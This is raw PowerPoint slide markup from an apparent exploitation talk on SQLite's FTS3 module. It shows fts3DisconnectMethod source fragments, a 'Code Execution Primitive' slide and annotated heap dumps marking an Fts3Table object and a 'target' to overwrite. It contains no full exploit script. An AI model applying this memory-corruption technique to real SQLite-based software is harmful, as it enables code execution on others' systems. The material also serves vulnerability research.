              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>int</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00B0F0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>fts3DisconnectMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>(sqlite3_vtab</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pVtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>){</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Fts3Table</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*p</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(Fts3Table</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pVtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>;</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>int</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err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// Snipped for brevity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="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p-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pTokenizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>xDestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>     p-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pTokenizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="D0D0D0"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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sqlite3_free(p);</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>return</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SQLITE_OK;</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6402483" y="3847307"/>
            <a:ext cx="3513042" cy="75326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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276677" y="642072"/>
            <a:ext cx="4564285" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code Execution Primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138278099"/>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40 CC 2F A4 C3 80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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2890982" y="5131630"/>
            <a:ext cx="2310750" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fts3Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="5316296"/>
            <a:ext cx="275824" cy="3849"/>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16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456873" y="1157225"/>
            <a:ext cx="2744859" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The column object array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="1341891"/>
            <a:ext cx="275824" cy="3849"/>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2281382" y="3276432"/>
            <a:ext cx="2920350" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>One of the column names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="3461098"/>
            <a:ext cx="275824" cy="3849"/>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3987403"/>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40 CC 2F A4 C3 80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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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40 BA B1 20 C3 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>A0 2F B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928188" y="5493697"/>
            <a:ext cx="1312384" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Our target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243804" y="5678363"/>
            <a:ext cx="2929141" cy="0"/>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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8175669" y="5569359"/>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578075289"/>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40 CC 2F A4 C3 80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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21 54 A4 C3 21 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</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58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 43 B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5515592" y="4599545"/>
            <a:ext cx="5300190" cy="951509"/>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5515592" y="5550308"/>
            <a:ext cx="2649353" cy="259941"/>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3" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="5094627"/>
            <a:ext cx="275824" cy="3849"/>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879140" y="4909961"/>
            <a:ext cx="1312384" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Preserve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795211573"/>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40 CC 2F A4 C3 80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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21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30 21 54 A4 C3 21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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 43 B1 20 C3 21 00 00</a:t>
